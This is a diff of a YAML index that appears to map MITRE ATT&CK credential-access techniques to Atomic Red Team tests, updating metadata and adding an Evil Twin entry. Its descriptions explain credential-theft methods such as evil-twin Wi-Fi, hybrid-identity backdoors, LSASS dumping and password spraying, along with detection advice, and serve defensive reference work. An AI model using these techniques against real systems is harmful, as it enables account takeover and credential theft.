       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -45208,18 +45900,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -45242,9 +45934,6 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552
     atomic_tests:
     - name: AWS - Retrieve EC2 Password Data using stratus
@@ -45312,32 +46001,113 @@ credential-access:
           rm -rf stratus*
         name: sh
         elevation_required: false
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -45345,9 +46115,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -45356,21 +46126,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -45410,55 +46181,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -45488,6 +46214,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -45497,23 +46229,58 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45550,23 +46317,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -45599,21 +46366,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -45624,7 +46390,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45658,7 +46424,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -45686,7 +46452,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -45697,14 +46463,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -45812,12 +46577,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45854,6 +46618,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45866,7 +46631,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -45916,12 +46681,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45947,6 +46711,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -45962,18 +46727,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -46000,9 +46765,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests:
     - name: AWS - Password Spray an AWS using GoAWSConsoleSpray
@@ -46042,7 +46804,7 @@ credential-access:
         elevation_required: false
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -46053,13 +46815,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -46073,6 +46835,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -46083,12 +46846,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -46163,7 +46926,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -46209,7 +46971,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -46244,16 +47006,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -46263,21 +47023,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -46326,33 +47088,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
